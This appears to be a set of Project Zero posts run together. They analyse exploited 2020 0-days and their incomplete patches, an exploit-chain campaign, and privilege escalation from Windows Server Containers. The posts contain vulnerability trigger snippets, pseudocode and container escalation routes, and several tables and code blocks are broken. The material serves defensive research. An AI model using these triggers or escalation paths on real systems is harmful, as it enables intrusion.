var o2 = { toString: f2 };

// 2. create a bunch of string variables

for (var a = 0; a < 20000; a++) {

  spray[a] = "aaa";



In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.

The execution patch for CVE-2020-6820 is:

StreamList::CloseAll  Patched function




        For each stream: 










                          If StreamList is empty && mStreamControl:


                             Send__delete(this)  FREED HERE!

    PCacheStreamControlParent::SendCloseAll  Used here in call to Id()

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, Bug 1507180. 1507180 was discovered in November 2018 and patched in December 2019. 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, an explanatory comment for why the December 2019 patch was needed was added in early March 2020.

For 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls “higher” in StreamList::CloseAll. 

In my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated.  

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).

This vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The vulnerability is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is CVE-2019-5870. Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From this great write-up from ByteRaptors on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)



    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){

      ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));

      if(memcpyDestinationAddress != NULL){

        ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));

        DWORD copySize = *((DWORD*)(firstAddress + 0x28));






The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)



    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){


     ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA)); 

     if(srcAddress != NULL){

        DWORD copySize = *((DWORD*)(msgSend + 0x40));

           if(copySize <= 0x1FFFE) {

                ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));






In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.

To patch CVE-2014-9665, Freetype added a check to the rows and width prior to calculating the size as shown below.

if ( populate_map_and_metrics )


      FT_Long  size;

      metrics->width  = (FT_Int)imgWidth;

      metrics->height = (FT_Int)imgHeight;

      map->width      = metrics->width;

      map->rows       = metrics->height;

      map->pixel_mode = FT_PIXEL_MODE_BGRA;

      map->pitch      = map->width * 4;

      map->num_grays  = 256;

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

      size = map->rows * map->pitch; <- overflow size

      error = ft_glyphslot_alloc_bitmap( slot, size );

      if ( error )

        goto DestroyExit;


To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

     if ( populate_map_and_metrics )


+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }


       metrics->width  = (FT_UShort)imgWidth;

       metrics->height = (FT_UShort)imgHeight;

       map->width      = metrics->width;

       map->rows       = metrics->height;

       map->pixel_mode = FT_PIXEL_MODE_BGRA;

       map->pitch      = map->width * 4;

       map->num_grays  = 256;

-      /* reject too large bitmaps similarly to the rasterizer */

-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

-      {

-        error = FT_THROW( Array_Too_Large );

-        goto DestroyExit;

-      }


To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow.

Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that while it’s still a variant, it’s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The variant, CVE-2015-0993, was reported to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.


Vulnerability that was exploited in-the-wild

2nd patch

Internet Explorer



Google Chrome



Microsoft Windows



* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn’t comprehensively fix all of the variants. Microsoft patched CVE-2020-0968 in April 2020. We show the trigger in the section above.

Google Chrome CVE-2019-13674

CVE-2019-13674 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8’s integer type is that it is not closed under addition meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

var increment = -Infinity;

var k = 0;

// The initial loop value is 0 and the increment is -Infinity.

// This is permissible because 0 + -Infinity = -Infinity, an integer.

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    // Once the initial variable equals -Infinity (one loop through)

   // the increment is changed to +Infinity. -Infinity + +Infinity = NaN

    increment = +Infinity;


  if (++k > 10) {




To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. This patch was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry knows there is a detection gap in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

In-the-Wild Series: October 2020 0-day discovery

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server



Renderer RCE

Sandbox Escape

Local Privilege Escalation




Stack R/W via Type 1 Fonts (CVE-2020-27930)

Not needed

Info leak via mach message trailers (CVE-2020-27950)

Type confusion with turnstiles (CVE-2020-27932)




Freetype heap buffer overflow


Not needed

cng.sys heap buffer overflow (CVE-2020-17087)



** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.


V8 type confusion in TurboFan (CVE-2020-16009)






Freetype heap buffer overflow


Chrome for Android head buffer overflow (CVE-2020-16010)




Samsung Browser

Freetype heap buffer overflow


Chromium n-day


All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that while the entities between exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also lends us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.


Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Who Contains the Containers?

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:


USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM

 ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

 ---> Running in ac03df015872

Removing intermediate container ac03df015872

 ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

 ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

 ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

 ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image


I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName

-------  ------    -----      -----     ------     --  -- -----------

     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege



Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2



Name                                   Attributes

----                                   ----------

Mandatory Label\High Mandatory Level   Integrity, ...

Everyone                               Mandatory, ...

BUILTIN\Users                          Mandatory, ...

NT AUTHORITY\SERVICE                   Mandatory, ...

CONSOLE LOGON                          Mandatory, ...

NT AUTHORITY\Authenticated Users       Mandatory, ...

NT AUTHORITY\This Organization         Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL                                  Mandatory, ...

User Manager\AllContainers             Mandatory, ...



Name                          Luid              Enabled

----                          ----              -------

SeChangeNotifyPrivilege       00000000-00000017 True

SeImpersonatePrivilege        00000000-0000001D True

SeCreateGlobalPrivilege       00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName

----                                              --------

Ip                                                SymbolicLink

Tcp6                                              SymbolicLink

Http                                              Directory

Ip6                                               SymbolicLink

ahcache                                           SymbolicLink

WMIDataDevice                                     SymbolicLink

LanmanDatagramReceiver                            SymbolicLink

Tcp                                               SymbolicLink

LanmanRedirector                                  SymbolicLink

DxgKrnl                                           SymbolicLink

ConDrv                                            SymbolicLink

Null                                              SymbolicLink

MailslotRedirector                                SymbolicLink

NamedPipe                                         Device

Udp6                                              SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD                                            SymbolicLink

DeviceApi                                         SymbolicLink

MountPointManager                                 Device


Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name













PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name






Docker Inc.












The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name










PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

